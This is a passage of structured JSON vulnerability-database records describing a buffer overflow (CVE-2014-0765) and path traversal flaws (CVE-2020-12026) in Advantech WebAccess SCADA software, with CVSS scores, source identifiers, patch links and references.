"7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "VULHUB", "id": "VHN-68258" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied GotoCmd string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0765" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "BID", "id": "66722" }, { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68258" } ], "trust": 3.69 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0765", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66722", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201404-171", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02270", "trust": 1.2 }, { "db": "JVNDB", "id": "JVNDB-2014-001976", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2010", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-072", "trust": 0.7 }, { "db": "OSVDB", "id": "105564", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "6E57A0F4-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7DC830-463F-11E9-B94D-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "1685972E-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68258", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "VULHUB", "id": "VHN-68258" }, { "db": "BID", "id": "66722" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "id": "VAR-201404-0540", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "VULHUB", "id": "VHN-68258" } ], "trust": 1.951177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02270" } ] }, "last_update_date": "2024-11-23T21:45:11.385000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess GotoCmd parameter handles patch buffer overflow vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44792" }, { "title": "AdvantechWebAccessCHNNode_2014.03.03_3.3.1", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49251" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68258" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66722" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0765" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0765" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105564" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "VULHUB", "id": "VHN-68258" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "VULHUB", "id": "VHN-68258" }, { "db": "BID", "id": "66722" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-072" }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02270" }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68258" }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66722" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-171" }, { "date": "2014-04-12T04:37:31.503000", "db": "NVD", "id": "CVE-2014-0765" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-072" }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02270" }, { "date": "2015-07-09T00:00:00", "db": "VULHUB", "id": "VHN-68258" }, { "date": "2014-04-17T00:40:00", "db": "BID", "id": "66722" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-171" }, { "date": "2024-11-21T02:02:46.213000", "db": "NVD", "id": "CVE-2014-0765" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-171" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess GotoCmd Parameter Handling Stack Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02270" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-171" } ], "trust": 1.2 } }
var-202005-0312
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000277d in ViewSrv.dll. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202005-0312", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "9.0.0" }, { "model": "webaccess/scada", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.4.4" }, { "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005147" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" } ], "trust": 1.4 }, "cve": "CVE-2020-12026", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2020-12026", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005147", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2020-29742", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "f4254815-d8f8-4350-9a94-696eea61a062", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-164663", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12026", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2020-12026", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005147", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12026", "trust": 1.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12026", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-005147", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-29742", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202005-303", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164663", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2020-12026", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "VULHUB", "id": "VHN-164663" }, { "db": "VULMON", "id": "CVE-2020-12026" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "CNNVD", "id": "CNNVD-202005-303" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000277d in ViewSrv.dll. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required", "sources": [ { "db": "NVD", "id": "CVE-2020-12026" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "VULHUB", "id": "VHN-164663" }, { "db": "VULMON", "id": "CVE-2020-12026" } ], "trust": 3.96 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-12026", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-626", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-627", "trust": 1.4 }, { "db": "CNVD", "id": "CNVD-2020-29742", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-303", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005147", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9907", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9899", "trust": 0.7 }, { "db": "NSFOCUS", "id": "47694", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "IVD", "id": "F4254815-D8F8-4350-9A94-696EEA61A062", "trust": 0.2 }, { "db": "IVD", "id": "7B562860-41D1-412D-8D4E-7ED58E4B7F7D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164663", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12026", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "VULHUB", "id": "VHN-164663" }, { "db": "VULMON", "id": "CVE-2020-12026" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "CNNVD", "id": "CNNVD-202005-303" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "id": "VAR-202005-0312", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "VULHUB", "id": "VHN-164663" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "CNVD", "id": "CNVD-2020-29742" } ] }, "last_update_date": "2024-11-23T21:59:18.592000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node Path Traversal Vulnerability (CNVD-2020-29742)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218851" }, { "title": "Advantech WebAccess Node Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118654" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "CNNVD", "id": "CNNVD-202005-303" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 }, { "problemtype": "CWE-23", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164663" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-626/" }, { "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12026" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12026" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-627/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47694" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": 